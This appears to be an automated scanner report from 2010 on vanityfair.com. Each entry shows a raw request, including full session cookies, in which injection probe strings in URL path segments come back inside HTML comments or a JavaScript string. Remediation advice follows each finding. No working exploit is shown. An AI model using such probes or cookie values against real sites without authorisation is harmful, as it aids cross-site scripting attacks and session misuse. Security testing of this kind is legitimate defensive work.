GET /online/daily/2010/11/2010-gift-guide-original-keys.html90d33'%3bc6e7d19006a HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:59:10 GMT Date: Mon, 29 Nov 2010 16:49:10 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44644
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <script type="text/javascript"> CN.config.set({ title : document.title, url : 'http://www.vanityfair.com/online/daily/2010/11/2010-gift-guide-original-keys.html90d33';c6e7d19006a', description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue globally.", keywords : "Vanity ...[SNIP]...
The value of REST URL parameter 5 is copied into an HTML comment. The payload f731d-->9374b3139f2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /online/daily/2010/11/2010-gift-guide-original-keys.htmlf731d-->9374b3139f2 HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:59:12 GMT Date: Mon, 29 Nov 2010 16:49:12 GMT Connection: close Connection: Transfer-Encoding Content-Length: 47610
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into an HTML comment. The payload d8474-->34c932e97fc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /online/daily/2010d8474-->34c932e97fc/11/leslie-nielsen-of-naked-gun-movies-dead-at-84.html HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:58:34 GMT Date: Mon, 29 Nov 2010 16:48:34 GMT Connection: close Connection: Transfer-Encoding Content-Length: 47786
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82871'%3b13c6cb3812c was submitted in the REST URL parameter 3. This input was echoed as 82871';13c6cb3812c in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /online/daily/201082871'%3b13c6cb3812c/11/leslie-nielsen-of-naked-gun-movies-dead-at-84.html HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:58:32 GMT Date: Mon, 29 Nov 2010 16:48:32 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44658
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <script type="text/javascript"> CN.config.set({ title : document.title, url : 'http://www.vanityfair.com/online/daily/201082871';13c6cb3812c/11/leslie-nielsen-of-naked-gun-movies-dead-at-84.html', description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload 65dbb-->03384675ace was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /online/daily/2010/1165dbb-->03384675ace/leslie-nielsen-of-naked-gun-movies-dead-at-84.html HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:58:56 GMT Date: Mon, 29 Nov 2010 16:48:56 GMT Connection: close Connection: Transfer-Encoding Content-Length: 47780
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74c61'%3bf4c9c5b674a was submitted in the REST URL parameter 4. This input was echoed as 74c61';f4c9c5b674a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /online/daily/2010/1174c61'%3bf4c9c5b674a/leslie-nielsen-of-naked-gun-movies-dead-at-84.html HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:58:51 GMT Date: Mon, 29 Nov 2010 16:48:51 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44660
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <script type="text/javascript"> CN.config.set({ title : document.title, url : 'http://www.vanityfair.com/online/daily/2010/1174c61';f4c9c5b674a/leslie-nielsen-of-naked-gun-movies-dead-at-84.html', description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the po ...[SNIP]...
The value of REST URL parameter 5 is copied into an HTML comment. The payload 9a6fc-->5e7991969f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /online/daily/2010/11/leslie-nielsen-of-naked-gun-movies-dead-at-84.html9a6fc-->5e7991969f HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:59:10 GMT Date: Mon, 29 Nov 2010 16:49:10 GMT Connection: close Connection: Transfer-Encoding Content-Length: 47773
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ad547'%3b7239765144 was submitted in the REST URL parameter 5. This input was echoed as ad547';7239765144 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /online/daily/2010/11/leslie-nielsen-of-naked-gun-movies-dead-at-84.htmlad547'%3b7239765144 HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:59:08 GMT Date: Mon, 29 Nov 2010 16:49:08 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44659
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <script type="text/javascript"> CN.config.set({ title : document.title, url : 'http://www.vanityfair.com/online/daily/2010/11/leslie-nielsen-of-naked-gun-movies-dead-at-84.htmlad547';7239765144', description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue globally.", keywords : "Vanity ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4729e'%3b519e2f92600 was submitted in the REST URL parameter 3. This input was echoed as 4729e';519e2f92600 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /online/daily/20104729e'%3b519e2f92600/11/nightmare-before-thanksgiving-tim-burton-takes-toronto.html HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:58:51 GMT Date: Mon, 29 Nov 2010 16:48:51 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44669
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <script type="text/javascript"> CN.config.set({ title : document.title, url : 'http://www.vanityfair.com/online/daily/20104729e';519e2f92600/11/nightmare-before-thanksgiving-tim-burton-takes-toronto.html', description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that d ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload 8bf02-->73664d074c6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /online/daily/20108bf02-->73664d074c6/11/nightmare-before-thanksgiving-tim-burton-takes-toronto.html HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:58:56 GMT Date: Mon, 29 Nov 2010 16:48:56 GMT Connection: close Connection: Transfer-Encoding Content-Length: 47885
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into an HTML comment. The payload a12b6-->5191f3c441e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /online/daily/2010/11a12b6-->5191f3c441e/nightmare-before-thanksgiving-tim-burton-takes-toronto.html HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:59:09 GMT Date: Mon, 29 Nov 2010 16:49:09 GMT Connection: close Connection: Transfer-Encoding Content-Length: 47885
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... use bug: com.amg.condenet.commons.exceptions.ApplicationBug: -:[1491354772]:- Thread id: 40. Cause: java.lang.IllegalArgumentException. Msg: Invalid uri 'http://blog.vanityfair.com/online/daily/2010/11a12b6-->5191f3c441e/nightmare-before-thanksgiving-tim-burton-takes-toronto.html?proxyuri=online%2Fdaily%2F2010%2F11a12b6--%3E5191f3c441e%2Fnightmare-before-thanksgiving-tim-burton-takes-toronto.html': escaped absolute pa ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 302a1'%3be04106ebc1e was submitted in the REST URL parameter 4. This input was echoed as 302a1';e04106ebc1e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /online/daily/2010/11302a1'%3be04106ebc1e/nightmare-before-thanksgiving-tim-burton-takes-toronto.html HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:59:07 GMT Date: Mon, 29 Nov 2010 16:49:07 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44669
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <script type="text/javascript"> CN.config.set({ title : document.title, url : 'http://www.vanityfair.com/online/daily/2010/11302a1';e04106ebc1e/nightmare-before-thanksgiving-tim-burton-takes-toronto.html', description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that driv ...[SNIP]...
The value of REST URL parameter 5 is copied into an HTML comment. The payload 9f353-->478b8db9bd1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
